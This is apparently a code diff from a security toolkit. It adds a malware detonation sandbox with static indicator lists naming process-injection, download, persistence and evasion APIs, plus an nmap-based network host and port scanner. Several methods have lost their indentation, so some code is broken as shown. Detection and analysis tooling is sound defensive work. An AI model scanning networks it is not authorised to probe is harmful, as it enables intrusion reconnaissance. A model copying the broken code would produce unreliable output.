                    rule_id = rule['id']
                    # Threshold check
                    if rule.get('threshold', 1) > 1 and rule.get('window_seconds', 0) > 0:
                        with self._lock:
                            self._rule_hits[rule_id].append(now)
                            # Clean old hits
                            window = rule['window_seconds']
                            self._rule_hits[rule_id] = [
                                t for t in self._rule_hits[rule_id]
                                if now - t <= window
                            ]
                            if len(self._rule_hits[rule_id]) < rule['threshold']:
                                continue
                    alert = {
                        'timestamp': datetime.now(timezone.utc).isoformat(),
                        'rule_id': rule_id,
                        'rule_name': rule['name'],
                        'severity': rule['severity'],
                        'description': rule['description'],
                        'source': entry.get('source_file', ''),
                        'log_entry': entry.get('message', '')[:200],
                        'raw': entry.get('raw', '')[:300]
                    }
                    self.alerts.append(alert)
                    new_alerts.append(alert)
            except re.error:
                # Skip rules with invalid regex rather than aborting the scan.
                pass
        return new_alerts
    # ── Rule Management ──────────────────────────────────────────────────
    def add_rule(self, rule_id: str, name: str, pattern: str,
                 severity: str = 'medium', threshold: int = 1,
                 window_seconds: int = 0, description: str = '') -> Dict:
        """Add custom detection rule and persist it; validates the regex first."""
        # Validate regex
        try:
            re.compile(pattern)
        except re.error as e:
            return {'ok': False, 'error': f'Invalid regex: {e}'}
        rule = {
            'id': rule_id, 'name': name, 'pattern': pattern,
            'severity': severity, 'threshold': threshold,
            'window_seconds': window_seconds,
            'description': description
        }
        self.rules.append(rule)
        self._save_custom_rules()
        return {'ok': True, 'rule': rule}
    def remove_rule(self, rule_id: str) -> Dict:
        """Remove a custom rule. Built-in rules cannot be removed."""
        default_ids = {r['id'] for r in DEFAULT_RULES}
        if rule_id in default_ids:
            return {'ok': False, 'error': 'Cannot remove built-in rule'}
        before = len(self.rules)
        self.rules = [r for r in self.rules if r['id'] != rule_id]
        if len(self.rules) < before:
            self._save_custom_rules()
            return {'ok': True}
        return {'ok': False, 'error': 'Rule not found'}
    def get_rules(self) -> List[Dict]:
        """List all detection rules, each tagged with a 'builtin' flag."""
        default_ids = {r['id'] for r in DEFAULT_RULES}
        return [{**r, 'builtin': r['id'] in default_ids} for r in self.rules]
    # ── Analysis ─────────────────────────────────────────────────────────
    def search_logs(self, query: str, source: Optional[str] = None,
                    limit: int = 100) -> List[Dict]:
        """Search ingested logs (case-insensitive substring, newest first)."""
        results = []
        for entry in reversed(self.logs):
            if source and entry.get('source_file') != source:
                continue
            if query.lower() in (entry.get('message', '') + entry.get('raw', '')).lower():
                results.append(entry)
                if len(results) >= limit:
                    break
        return results
    def get_stats(self) -> Dict:
        """Get correlator statistics (totals plus severity/rule/source breakdowns)."""
        severity_counts = Counter(a['severity'] for a in self.alerts)
        rule_counts = Counter(a['rule_id'] for a in self.alerts)
        source_counts = Counter(e.get('source_file', '') for e in self.logs)
        return {
            'total_logs': len(self.logs),
            'total_alerts': len(self.alerts),
            'sources': len(self.sources),
            'rules': len(self.rules),
            'alerts_by_severity': dict(severity_counts),
            'top_rules': dict(rule_counts.most_common(10)),
            'top_sources': dict(source_counts.most_common(10))
        }
    def get_alerts(self, severity: Optional[str] = None, limit: int = 100) -> List[Dict]:
        """Get alerts with optional filtering (most recent `limit` entries)."""
        alerts = self.alerts
        if severity:
            alerts = [a for a in alerts if a['severity'] == severity]
        return alerts[-limit:]
    def clear_alerts(self):
        """Clear all alerts (also persists the now-empty list)."""
        self.alerts.clear()
        self._save_alerts()
    def clear_logs(self):
        """Clear ingested logs and source metadata (alerts are kept)."""
        self.logs.clear()
        self.sources.clear()
    def get_sources(self) -> Dict:
        """Get ingested log sources."""
        return self.sources
    def get_timeline(self, hours: int = 24) -> List[Dict]:
        """Get alert timeline grouped by hour.

        Note: returns the last `hours` *non-empty* hour buckets (sorted by
        the alert timestamp's YYYY-MM-DDTHH prefix), not a fixed wall-clock
        span.
        """
        timeline = defaultdict(lambda: {'count': 0, 'critical': 0, 'high': 0, 'medium': 0, 'low': 0})
        for alert in self.alerts:
            ts = alert.get('timestamp', '')[:13]  # YYYY-MM-DDTHH
            timeline[ts]['count'] += 1
            sev = alert.get('severity', 'low')
            timeline[ts][sev] = timeline[ts].get(sev, 0) + 1
        return [{'hour': k, **v} for k, v in sorted(timeline.items())[-hours:]]
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None  # lazily-created module-level singleton
def get_log_correlator() -> LogCorrelator:
    """Return the shared LogCorrelator instance, creating it on first use."""
    global _instance
    if _instance is None:
        _instance = LogCorrelator()
    return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
    """CLI entry point for Log Correlator module.

    Interactive menu loop over the shared engine; returns when the user
    selects 0. EOFError/KeyboardInterrupt from input() propagate to the
    caller.
    """
    engine = get_log_correlator()
    while True:
        # Stats are refreshed each pass so the header stays current.
        stats = engine.get_stats()
        print(f"\n{'='*60}")
        print(f" Log Correlator ({stats['total_logs']} logs, {stats['total_alerts']} alerts)")
        print(f"{'='*60}")
        print()
        print(" 1 — Ingest Log File")
        print(" 2 — Paste Log Text")
        print(" 3 — Search Logs")
        print(" 4 — View Alerts")
        print(" 5 — Manage Rules")
        print(" 6 — View Stats")
        print(" 7 — Alert Timeline")
        print(" 8 — Clear Alerts")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            filepath = input(" Log file path: ").strip()
            if filepath:
                result = engine.ingest_file(filepath)
                if result['ok']:
                    print(f" Parsed {result['lines_parsed']} lines, "
                          f"{result['alerts_generated']} alerts generated")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '2':
            print(" Paste log lines (blank line to finish):")
            lines = []
            while True:
                line = input()
                if not line:
                    break
                lines.append(line)
            if lines:
                result = engine.ingest_text('\n'.join(lines))
                print(f" Parsed {result['lines_parsed']} lines, "
                      f"{result['alerts_generated']} alerts")
        elif choice == '3':
            query = input(" Search query: ").strip()
            if query:
                results = engine.search_logs(query)
                print(f" {len(results)} matches:")
                for r in results[:10]:
                    print(f" [{r.get('source_file', '?')}] {r.get('message', '')[:80]}")
        elif choice == '4':
            sev = input(" Severity filter (blank=all): ").strip() or None
            alerts = engine.get_alerts(severity=sev)
            for a in alerts[-15:]:
                print(f" [{a['severity']:<8}] {a['rule_name']}: {a['log_entry'][:60]}")
        elif choice == '5':
            # View-only: rules are listed, not edited, from this menu.
            rules = engine.get_rules()
            for r in rules:
                builtin = ' (built-in)' if r.get('builtin') else ''
                print(f" {r['id']}: {r['name']} [{r['severity']}]{builtin}")
        elif choice == '6':
            print(f" Logs: {stats['total_logs']}")
            print(f" Alerts: {stats['total_alerts']}")
            print(f" Sources: {stats['sources']}")
            print(f" Rules: {stats['rules']}")
            if stats['alerts_by_severity']:
                print(f" By severity: {stats['alerts_by_severity']}")
        elif choice == '7':
            timeline = engine.get_timeline()
            for t in timeline[-12:]:
                # ASCII bar chart capped at 40 columns.
                bar = '#' * min(t['count'], 40)
                print(f" {t['hour']} | {bar} ({t['count']})")
        elif choice == '8':
            engine.clear_alerts()
            print(" Alerts cleared")

524
modules/malware_sandbox.py Normal file
View File

@@ -0,0 +1,524 @@
"""AUTARCH Malware Sandbox
Isolated sample detonation (Docker-based), behavior logging, API call tracing,
network activity monitoring, and file system change tracking.
"""
DESCRIPTION = "Malware detonation sandbox & analysis"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import shutil
import hashlib
import subprocess
import threading
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
try:
    from core.paths import find_tool, get_data_dir
except ImportError:
    # Stand-alone fallbacks when AUTARCH's core package is not importable.
    def find_tool(name):
        """Locate *name* on PATH (fallback for core.paths.find_tool)."""
        return shutil.which(name)
    def get_data_dir():
        """Return the default data directory path (fallback for core.paths)."""
        return str(Path(__file__).parent.parent / 'data')
# ── YARA Rules (basic) ──────────────────────────────────────────────────────
BASIC_YARA_INDICATORS = {
    # Raw byte substrings searched for in the sample during static analysis;
    # each category with at least one match contributes to the risk score.
    'suspicious_imports': [
        b'CreateRemoteThread', b'VirtualAllocEx', b'WriteProcessMemory',
        b'NtQueryInformationProcess', b'IsDebuggerPresent',
        b'GetProcAddress', b'LoadLibraryA', b'ShellExecuteA',
    ],
    'crypto_indicators': [
        b'CryptEncrypt', b'CryptDecrypt', b'BCryptEncrypt',
        b'AES', b'RSA', b'BEGIN PUBLIC KEY',
    ],
    'network_indicators': [
        b'InternetOpenA', b'HttpOpenRequestA', b'URLDownloadToFile',
        b'WSAStartup', b'connect', b'send', b'recv',
        b'http://', b'https://', b'ftp://',
    ],
    'persistence_indicators': [
        b'CurrentVersion\\Run', b'SOFTWARE\\Microsoft\\Windows\\CurrentVersion',
        b'schtasks', b'at.exe', b'HKEY_LOCAL_MACHINE', b'HKEY_CURRENT_USER',
        b'crontab', b'/etc/cron',
    ],
    'evasion_indicators': [
        b'IsDebuggerPresent', b'CheckRemoteDebuggerPresent',
        b'NtSetInformationThread', b'vmware', b'virtualbox', b'vbox',
        b'sandbox', b'SbieDll.dll',
    ],
}
# ── Sandbox Engine ───────────────────────────────────────────────────────────
class MalwareSandbox:
"""Isolated malware analysis environment."""
    def __init__(self):
        """Create data/sample/report directories and locate external tools."""
        self.data_dir = os.path.join(get_data_dir(), 'sandbox')
        os.makedirs(self.data_dir, exist_ok=True)
        self.samples_dir = os.path.join(self.data_dir, 'samples')
        os.makedirs(self.samples_dir, exist_ok=True)
        self.reports_dir = os.path.join(self.data_dir, 'reports')
        os.makedirs(self.reports_dir, exist_ok=True)
        # External tool paths; each is None when the tool is not installed.
        self.docker = find_tool('docker') or shutil.which('docker')
        self.strace = shutil.which('strace')
        self.ltrace = shutil.which('ltrace')
        self.file_cmd = shutil.which('file')
        self.strings_cmd = find_tool('strings') or shutil.which('strings')
        self.analyses: List[Dict] = []    # completed analysis results
        self._jobs: Dict[str, Dict] = {}  # background dynamic-analysis jobs
    def get_status(self) -> Dict:
        """Get sandbox capabilities.

        Docker counts as available only when the daemon answers `docker info`,
        not merely when the binary exists on PATH.
        """
        docker_ok = False
        if self.docker:
            try:
                result = subprocess.run([self.docker, 'info'],
                                        capture_output=True, timeout=5)
                docker_ok = result.returncode == 0
            except Exception:
                pass
        return {
            'docker': docker_ok,
            'strace': self.strace is not None,
            'ltrace': self.ltrace is not None,
            'file': self.file_cmd is not None,
            'strings': self.strings_cmd is not None,
            'samples': len(list(Path(self.samples_dir).iterdir())),
            'analyses': len(self.analyses)
        }
# ── Sample Management ────────────────────────────────────────────────
    def submit_sample(self, filepath: str, name: Optional[str] = None) -> Dict:
        """Submit a sample for analysis.

        Hashes the file (MD5/SHA1/SHA256) and copies it into the samples
        directory under a sanitized, hash-prefixed name. Returns an
        ok/error dict; on success 'sample' describes the stored copy.
        """
        if not os.path.exists(filepath):
            return {'ok': False, 'error': 'File not found'}
        # Hash the sample
        hashes = {}
        with open(filepath, 'rb') as f:
            data = f.read()
        hashes['md5'] = hashlib.md5(data).hexdigest()
        hashes['sha1'] = hashlib.sha1(data).hexdigest()
        hashes['sha256'] = hashlib.sha256(data).hexdigest()
        # Copy to samples dir
        sample_name = name or Path(filepath).name
        # Sanitize the name so it is safe as a filename component.
        safe_name = re.sub(r'[^\w.\-]', '_', sample_name)
        dest = os.path.join(self.samples_dir, f'{hashes["sha256"][:16]}_{safe_name}')
        shutil.copy2(filepath, dest)
        sample = {
            'name': sample_name,
            'path': dest,
            'size': os.path.getsize(dest),
            'hashes': hashes,
            'submitted': datetime.now(timezone.utc).isoformat()
        }
        return {'ok': True, 'sample': sample}
def list_samples(self) -> List[Dict]:
"""List submitted samples."""
samples = []
for f in Path(self.samples_dir).iterdir():
if f.is_file():
samples.append({
'name': f.name,
'path': str(f),
'size': f.stat().st_size,
'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
})
return samples
# ── Static Analysis ──────────────────────────────────────────────────
    def static_analysis(self, filepath: str) -> Dict:
        """Perform static analysis on a sample.

        Steps: file-type identification (`file`), hashing, strings
        extraction with URL/IP/email/path harvesting, byte-signature
        matching against BASIC_YARA_INDICATORS, PE/ELF header parsing,
        and a weighted risk score. External-tool steps are skipped when
        the tool is unavailable.
        """
        if not os.path.exists(filepath):
            return {'ok': False, 'error': 'File not found'}
        result = {
            'ok': True,
            'file': filepath,
            'name': Path(filepath).name,
            'size': os.path.getsize(filepath)
        }
        # File type identification
        if self.file_cmd:
            try:
                out = subprocess.check_output([self.file_cmd, filepath],
                                              text=True, timeout=10)
                # Keep only the description after "filename: ".
                result['file_type'] = out.split(':', 1)[-1].strip()
            except Exception:
                pass
        # Hashes
        with open(filepath, 'rb') as f:
            data = f.read()
        result['hashes'] = {
            'md5': hashlib.md5(data).hexdigest(),
            'sha1': hashlib.sha1(data).hexdigest(),
            'sha256': hashlib.sha256(data).hexdigest()
        }
        # Strings extraction
        if self.strings_cmd:
            try:
                out = subprocess.check_output(
                    [self.strings_cmd, '-n', '6', filepath],
                    text=True, timeout=30, stderr=subprocess.DEVNULL
                )
                strings = out.strip().split('\n')
                result['strings_count'] = len(strings)
                # Extract interesting strings
                urls = [s for s in strings if re.match(r'https?://', s)]
                ips = [s for s in strings if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', s)]
                emails = [s for s in strings if re.match(r'[^@]+@[^@]+\.[^@]+', s)]
                paths = [s for s in strings if s.startswith('/') or '\\' in s]
                result['interesting_strings'] = {
                    'urls': urls[:20],
                    'ips': list(set(ips))[:20],
                    'emails': list(set(emails))[:10],
                    'paths': paths[:20]
                }
            except Exception:
                pass
        # YARA-like signature matching
        indicators = {}
        for category, patterns in BASIC_YARA_INDICATORS.items():
            matches = [p.decode('utf-8', errors='replace') for p in patterns if p in data]
            if matches:
                indicators[category] = matches
        result['indicators'] = indicators
        result['indicator_count'] = sum(len(v) for v in indicators.values())
        # PE header analysis
        if data[:2] == b'MZ':
            result['pe_info'] = self._parse_pe_header(data)
        # ELF header analysis
        if data[:4] == b'\x7fELF':
            result['elf_info'] = self._parse_elf_header(data)
        # Risk score: fixed weight per matched category, capped at 100.
        score = 0
        if indicators.get('evasion_indicators'):
            score += 30
        if indicators.get('persistence_indicators'):
            score += 25
        if indicators.get('suspicious_imports'):
            score += 20
        if indicators.get('network_indicators'):
            score += 15
        if indicators.get('crypto_indicators'):
            score += 10
        result['risk_score'] = min(100, score)
        result['risk_level'] = (
            'critical' if score >= 70 else
            'high' if score >= 50 else
            'medium' if score >= 30 else
            'low' if score >= 10 else
            'clean'
        )
        return result
def _parse_pe_header(self, data: bytes) -> Dict:
"""Basic PE header parsing."""
info = {'format': 'PE'}
try:
import struct
e_lfanew = struct.unpack_from('<I', data, 0x3C)[0]
if data[e_lfanew:e_lfanew+4] == b'PE\x00\x00':
machine = struct.unpack_from('<H', data, e_lfanew + 4)[0]
info['machine'] = {0x14c: 'i386', 0x8664: 'x86_64', 0x1c0: 'ARM'}.get(machine, hex(machine))
num_sections = struct.unpack_from('<H', data, e_lfanew + 6)[0]
info['sections'] = num_sections
timestamp = struct.unpack_from('<I', data, e_lfanew + 8)[0]
info['compile_time'] = datetime.fromtimestamp(timestamp, timezone.utc).isoformat()
except Exception:
pass
return info
def _parse_elf_header(self, data: bytes) -> Dict:
"""Basic ELF header parsing."""
info = {'format': 'ELF'}
try:
import struct
ei_class = data[4]
info['bits'] = {1: 32, 2: 64}.get(ei_class, 0)
ei_data = data[5]
info['endian'] = {1: 'little', 2: 'big'}.get(ei_data, 'unknown')
e_type = struct.unpack_from('<H', data, 16)[0]
info['type'] = {1: 'relocatable', 2: 'executable', 3: 'shared', 4: 'core'}.get(e_type, str(e_type))
except Exception:
pass
return info
# ── Dynamic Analysis (Docker) ────────────────────────────────────────
def dynamic_analysis(self, filepath: str, timeout: int = 60) -> str:
    """Run sample in Docker sandbox. Returns job_id.

    Launches a background thread; callers poll get_job(job_id) for
    status/result. Returns '' when Docker is not available.
    The container is isolated: no network, memory/CPU capped, read-only
    root with a small tmpfs for the copied sample.
    """
    if not self.docker:
        return ''
    job_id = f'sandbox_{int(time.time())}'
    self._jobs[job_id] = {
        'type': 'dynamic', 'status': 'running',
        'result': None, 'started': time.time()
    }
    def _run():
        try:
            container_name = f'autarch_sandbox_{job_id}'
            sample_name = Path(filepath).name
            # Run in isolated container
            cmd = [
                self.docker, 'run', '--rm',
                '--name', container_name,
                '--network', 'none',  # No network
                '--memory', '256m',  # Memory limit
                '--cpus', '1',  # CPU limit
                '--read-only',  # Read-only root
                '--tmpfs', '/tmp:size=64m',
                '-v', f'{os.path.abspath(filepath)}:/sample/{sample_name}:ro',
                'ubuntu:22.04',
                'bash', '-c', f'''
# Log file operations
cp /sample/{sample_name} /tmp/test_sample
chmod +x /tmp/test_sample 2>/dev/null
# Try to run with strace if available
timeout {timeout} strace -f -o /tmp/trace.log /tmp/test_sample 2>/tmp/stderr.log || true
cat /tmp/trace.log 2>/dev/null | head -1000
echo "---STDERR---"
cat /tmp/stderr.log 2>/dev/null | head -100
'''
            ]
            # NOTE(review): strace is presumably present in the image — the
            # ubuntu:22.04 base does not ship it by default; confirm, else
            # trace.log stays empty and only stderr is captured.
            result = subprocess.run(cmd, capture_output=True, text=True,
                                    timeout=timeout + 30)
            # Parse strace output
            syscalls = {}
            files_accessed = []
            network_calls = []
            for line in result.stdout.split('\n'):
                # Count syscalls: first word before an opening paren.
                sc_match = re.match(r'.*?(\w+)\(', line)
                if sc_match:
                    sc = sc_match.group(1)
                    syscalls[sc] = syscalls.get(sc, 0) + 1
                # File access: first quoted path on open/openat lines.
                if 'open(' in line or 'openat(' in line:
                    f_match = re.search(r'"([^"]+)"', line)
                    if f_match:
                        files_accessed.append(f_match.group(1))
                # Network: raw connect/socket call lines (truncated to 100 chars).
                if 'connect(' in line or 'socket(' in line:
                    network_calls.append(line.strip()[:100])
            self._jobs[job_id]['status'] = 'complete'
            self._jobs[job_id]['result'] = {
                'ok': True,
                'syscalls': syscalls,
                'syscall_count': sum(syscalls.values()),
                'files_accessed': list(set(files_accessed))[:50],
                'network_calls': network_calls[:20],
                'exit_code': result.returncode,
                'stderr': result.stderr[:500] if result.stderr else ''
            }
        except subprocess.TimeoutExpired:
            # Kill container — a still-running sample keeps it alive otherwise.
            subprocess.run([self.docker, 'kill', container_name],
                           capture_output=True)
            self._jobs[job_id]['status'] = 'complete'
            self._jobs[job_id]['result'] = {
                'ok': True, 'timeout': True,
                'message': 'Analysis timed out (sample may be long-running)'
            }
        except Exception as e:
            self._jobs[job_id]['status'] = 'error'
            self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)}
    threading.Thread(target=_run, daemon=True).start()
    return job_id
# ── Report Generation ────────────────────────────────────────────────
def generate_report(self, filepath: str, include_dynamic: bool = False) -> Dict:
    """Run static analysis on *filepath* and persist a JSON report.

    The report file is named after the sample's truncated SHA-256 and
    written under the reports directory; an entry is also appended to the
    in-memory analyses list. Returns the report dict plus 'ok' and
    'report_path'.
    """
    static = self.static_analysis(filepath)
    sample_name = Path(filepath).name
    report = {
        'timestamp': datetime.now(timezone.utc).isoformat(),
        'sample': {
            'name': sample_name,
            'path': filepath,
            'size': static.get('size', 0),
            'hashes': static.get('hashes', {}),
        },
        'static_analysis': static,
        'risk_score': static.get('risk_score', 0),
        'risk_level': static.get('risk_level', 'unknown'),
    }
    # Report filename keyed on the sample's (truncated) SHA-256.
    sha_prefix = static.get('hashes', {}).get('sha256', 'unknown')[:16]
    report_path = os.path.join(self.reports_dir, f'report_{sha_prefix}.json')
    with open(report_path, 'w') as fh:
        json.dump(report, fh, indent=2)
    report['report_path'] = report_path
    self.analyses.append({
        'name': sample_name,
        'report': report_path,
        'risk': report['risk_level'],
        'timestamp': report['timestamp'],
    })
    return {'ok': True, **report}
def list_reports(self) -> List[Dict]:
    """Summarize every saved JSON report in the reports directory.

    Unreadable or malformed report files are silently skipped.
    """
    summaries = []
    for report_file in Path(self.reports_dir).glob('*.json'):
        try:
            data = json.loads(report_file.read_text())
            summaries.append({
                'name': report_file.name,
                'path': str(report_file),
                'sample': data.get('sample', {}).get('name', ''),
                'risk': data.get('risk_level', 'unknown'),
                'timestamp': data.get('timestamp', ''),
            })
        except Exception:
            continue  # corrupt / non-dict report: skip it
    return summaries
# ── Job Management ───────────────────────────────────────────────────
def get_job(self, job_id: str) -> Optional[Dict]:
    """Return the background-job record for *job_id*, or None if unknown."""
    job = self._jobs.get(job_id)
    return job
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_sandbox() -> MalwareSandbox:
    """Return the process-wide MalwareSandbox, creating it on first use."""
    global _instance
    if _instance is not None:
        return _instance
    _instance = MalwareSandbox()
    return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
    """CLI entry point for Malware Sandbox module.

    Interactive menu loop: submit samples, run static/dynamic analysis,
    generate reports, and list samples/reports. Returns when the user
    selects 0.
    """
    sandbox = get_sandbox()
    while True:
        # Refresh status each pass so docker/sample counts stay current.
        status = sandbox.get_status()
        print(f"\n{'='*60}")
        print(f" Malware Sandbox")
        print(f"{'='*60}")
        print(f" Docker: {'OK' if status['docker'] else 'NOT AVAILABLE'}")
        print(f" Samples: {status['samples']} Analyses: {status['analyses']}")
        print()
        print(" 1 — Submit Sample")
        print(" 2 — Static Analysis")
        print(" 3 — Dynamic Analysis (Docker)")
        print(" 4 — Full Report")
        print(" 5 — List Samples")
        print(" 6 — List Reports")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            # Copy a file into the sample store and show its identity hashes.
            path = input(" File path: ").strip()
            if path:
                result = sandbox.submit_sample(path)
                if result['ok']:
                    s = result['sample']
                    print(f" Submitted: {s['name']} ({s['size']} bytes)")
                    print(f" SHA256: {s['hashes']['sha256']}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '2':
            # Static-only pass: file type, risk score, string/indicator summary.
            path = input(" Sample path: ").strip()
            if path:
                result = sandbox.static_analysis(path)
                if result['ok']:
                    print(f" Type: {result.get('file_type', 'unknown')}")
                    print(f" Risk: {result['risk_level']} ({result['risk_score']}/100)")
                    print(f" Strings: {result.get('strings_count', 0)}")
                    for cat, matches in result.get('indicators', {}).items():
                        print(f" {cat}: {', '.join(matches[:5])}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '3':
            if not status['docker']:
                print(" Docker not available")
                continue
            path = input(" Sample path: ").strip()
            if path:
                job_id = sandbox.dynamic_analysis(path)
                print(f" Running in sandbox (job: {job_id})...")
                # Poll the background job every 2s until it finishes.
                while True:
                    job = sandbox.get_job(job_id)
                    if job['status'] != 'running':
                        r = job['result']
                        if r.get('ok'):
                            print(f" Syscalls: {r.get('syscall_count', 0)}")
                            print(f" Files: {len(r.get('files_accessed', []))}")
                            print(f" Network: {len(r.get('network_calls', []))}")
                        else:
                            print(f" Error: {r.get('error', 'Unknown')}")
                        break
                    time.sleep(2)
        elif choice == '4':
            path = input(" Sample path: ").strip()
            if path:
                result = sandbox.generate_report(path)
                if result['ok']:
                    print(f" Report: {result['report_path']}")
                    print(f" Risk: {result['risk_level']} ({result['risk_score']}/100)")
        elif choice == '5':
            for s in sandbox.list_samples():
                print(f" {s['name']} ({s['size']} bytes)")
        elif choice == '6':
            for r in sandbox.list_reports():
                print(f" [{r['risk']}] {r['sample']} {r['timestamp'][:19]}")

1147
modules/mitm_proxy.py Normal file

File diff suppressed because it is too large Load Diff

1527
modules/msf.py Normal file

File diff suppressed because it is too large Load Diff

1258
modules/mysystem.py Normal file

File diff suppressed because it is too large Load Diff

509
modules/net_mapper.py Normal file
View File

@@ -0,0 +1,509 @@
"""AUTARCH Network Topology Mapper
Host discovery, service enumeration, OS fingerprinting, and visual
network topology mapping with scan diffing.
"""
DESCRIPTION = "Network topology discovery & mapping"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import socket
import struct
import threading
import subprocess
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
from dataclasses import dataclass, field
# Prefer the AUTARCH core helpers; fall back to standalone equivalents so the
# module still works when imported outside the framework.
try:
    from core.paths import find_tool, get_data_dir
except ImportError:
    import shutil
    def find_tool(name):
        # Fallback: resolve an executable on PATH (None when not found).
        return shutil.which(name)
    def get_data_dir():
        # Fallback: use <repo>/data, one level above the modules directory.
        return str(Path(__file__).parent.parent / 'data')
@dataclass
class Host:
    """A discovered network host with its identification and open ports."""
    ip: str
    mac: str = ''
    hostname: str = ''
    os_guess: str = ''
    ports: List[dict] = field(default_factory=list)
    state: str = 'up'
    subnet: str = ''

    def to_dict(self) -> dict:
        """Serialize to a plain, JSON-friendly dict."""
        field_names = ('ip', 'mac', 'hostname', 'os_guess',
                       'ports', 'state', 'subnet')
        return {name: getattr(self, name) for name in field_names}
class NetMapper:
    """Network topology discovery and mapping.

    Discovery and per-host scans prefer nmap when installed and fall back to
    pure-socket TCP probing otherwise. Scans can be saved to JSON under the
    data directory and diffed against each other.

    Fixes vs. original:
      * _ping_sweep created ONE socket and reused it for connect_ex() on
        several ports — a TCP socket must not be reused after a connect
        attempt; a fresh socket is now created per port.
      * _cidr_to_ips returned an empty list for /31 and /32 because
        range(network+1, broadcast) is empty there; those now yield the
        base address.
    """
    def __init__(self):
        self._data_dir = os.path.join(get_data_dir(), 'net_mapper')
        os.makedirs(self._data_dir, exist_ok=True)
        # job_id -> {'done': bool, 'hosts': [dict], 'error': str|None}
        self._active_jobs: Dict[str, dict] = {}

    # ── Host Discovery ────────────────────────────────────────────────────
    def discover_hosts(self, target: str, method: str = 'auto',
                       timeout: float = 3.0) -> dict:
        """Discover live hosts on a network (asynchronously).

        target: IP, CIDR (192.168.1.0/24), or range (192.168.1.1-254)
        method: 'arp', 'icmp', 'tcp', 'nmap', 'auto'

        Returns {'ok': True, 'job_id': ...}; poll get_job_status(job_id)
        until 'done' to collect the host list.
        """
        job_id = f'discover_{int(time.time())}'
        holder = {'done': False, 'hosts': [], 'error': None}
        self._active_jobs[job_id] = holder
        def do_discover():
            try:
                nmap = find_tool('nmap')
                if method == 'nmap' or (method == 'auto' and nmap):
                    hosts = self._nmap_discover(target, nmap, timeout)
                elif method == 'icmp' or method == 'auto':
                    hosts = self._ping_sweep(target, timeout)
                elif method == 'tcp':
                    hosts = self._tcp_discover(target, timeout)
                else:
                    # Unknown method (incl. 'arp'): best-effort sweep.
                    hosts = self._ping_sweep(target, timeout)
                holder['hosts'] = [h.to_dict() for h in hosts]
            except Exception as e:
                holder['error'] = str(e)
            finally:
                holder['done'] = True
        threading.Thread(target=do_discover, daemon=True).start()
        return {'ok': True, 'job_id': job_id}

    def _nmap_discover(self, target: str, nmap: str, timeout: float) -> List[Host]:
        """Discover hosts using nmap ping scan (-sn) with ICMP echo + TCP ACK probes."""
        cmd = [nmap, '-sn', '-PE', '-PA21,22,80,443,445,3389', '-oX', '-', target]
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
            return self._parse_nmap_xml(result.stdout)
        except Exception:
            return []

    def _ping_sweep(self, target: str, timeout: float) -> List[Host]:
        """TCP-probe sweep over common ports (80/443/22/445).

        Despite the name, no raw ICMP is sent (that would need privileges);
        hosts are considered up if any common TCP port answers, which also
        finds hosts behind ICMP filtering.
        """
        ips = self._expand_target(target)
        hosts = []
        lock = threading.Lock()
        def probe(ip):
            for port in (80, 443, 22, 445):
                try:
                    # Fresh socket per attempt: a TCP socket cannot be
                    # reused for another connect() after a failed attempt.
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.settimeout(timeout)
                    connected = (s.connect_ex((ip, port)) == 0)
                    s.close()
                except Exception:
                    continue
                if not connected:
                    continue
                h = Host(ip=ip, state='up',
                         subnet='.'.join(ip.split('.')[:3]) + '.0/24')
                try:
                    h.hostname = socket.getfqdn(ip)
                    if h.hostname == ip:
                        h.hostname = ''  # getfqdn echoes the IP when no PTR exists
                except Exception:
                    pass
                with lock:
                    hosts.append(h)
                return  # one open port is enough to mark the host up
        threads = []
        for ip in ips:
            t = threading.Thread(target=probe, args=(ip,), daemon=True)
            threads.append(t)
            t.start()
            # Cap concurrency: drain in batches of 100 threads.
            if len(threads) >= 100:
                for t in threads:
                    t.join(timeout=timeout + 2)
                threads.clear()
        for t in threads:
            t.join(timeout=timeout + 2)
        return sorted(hosts, key=lambda h: [int(x) for x in h.ip.split('.')])

    def _tcp_discover(self, target: str, timeout: float) -> List[Host]:
        """TCP SYN scan for discovery."""
        return self._ping_sweep(target, timeout)  # Same logic for now

    # ── Port Scanning ─────────────────────────────────────────────────────
    def scan_host(self, ip: str, port_range: str = '1-1024',
                  service_detection: bool = True,
                  os_detection: bool = True) -> dict:
        """Detailed scan of a single host; nmap when available, else sockets."""
        nmap = find_tool('nmap')
        if nmap:
            return self._nmap_scan_host(ip, nmap, port_range,
                                        service_detection, os_detection)
        return self._socket_scan_host(ip, port_range)

    def _nmap_scan_host(self, ip: str, nmap: str, port_range: str,
                        svc: bool, os_det: bool) -> dict:
        """Run nmap against one host; -sV/-O added per flags (-O needs root)."""
        cmd = [nmap, '-Pn', '-p', port_range, '-oX', '-', ip]
        if svc:
            cmd.insert(2, '-sV')
        if os_det:
            cmd.insert(2, '-O')
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
            hosts = self._parse_nmap_xml(result.stdout)
            if hosts:
                return {'ok': True, 'host': hosts[0].to_dict(), 'raw': result.stdout}
            return {'ok': True, 'host': Host(ip=ip, state='unknown').to_dict()}
        except Exception as e:
            return {'ok': False, 'error': str(e)}

    def _socket_scan_host(self, ip: str, port_range: str) -> dict:
        """Fallback socket-based sequential TCP connect scan (no nmap)."""
        start_port, end_port = 1, 1024
        if '-' in port_range:
            parts = port_range.split('-')
